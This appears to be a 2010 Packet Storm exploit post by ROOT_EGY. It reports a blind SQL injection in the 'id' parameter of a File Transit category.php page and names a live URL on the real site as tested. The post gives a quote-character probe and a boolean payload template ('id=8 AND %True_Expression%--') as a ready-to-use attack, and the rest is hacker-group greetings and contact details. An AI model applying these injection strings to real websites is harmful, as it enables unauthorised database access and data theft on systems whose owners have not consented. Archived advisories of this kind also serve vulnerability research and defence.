File Transit Blind SQL Injection

2010-04-13T00:00:00
ID PACKETSTORM:88296
Type packetstorm
Reporter ROOT_EGY
Modified 2010-04-13T00:00:00

Description

                                        
                                            `  
  
  
# Exploit Title: (File Transit) Blind SQLI Injection Vulnerability.  
# Date: 13/4/2010  
# Author: ROOT_EGY  
# Software Link: www.filetransit.com  
# Version:  
# Tested on: http://www.filetransit.com/category.php?id=8  
# CVE :  
# Code :  
  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
ROOT_EGY | www.sec-war.com | r0t@hotmail.es  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
() SQLI ExPlOiT ()  
  
* www.target.com/path/category.php?id=8'  
  
* Injection ExpLoIT:  
  
* 8 AND %True_Expression% --  
  
* FULL SQL INJECT EXPLOIT :  
  
* www.target.com/path/category.php?id=8 AND %True_Expression%--  
  
() D0n3 //. ()  
  
  
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++  
GreetZ To : alnjm33 | H311 C0d3 | Elkatrez Elmodamer | HACKER-MAN | PrEdAtOr | ZaIdOoHxHaCEr | Sh0ot3R | EgY Sn!p3R | All EGYPTIAN HACKERZ |  
+++++++++++++++++++++++++++++++++++++++++++++++++++++  
  
  
<http://sec-war.com/cc//index.php?showuser=1397>  
  
________________________________  
Hotmail: Trusted email with powerful SPAM protection. Sign up now.<https://signup.live.com/signup.aspx?id=60969>  
  
  
  
`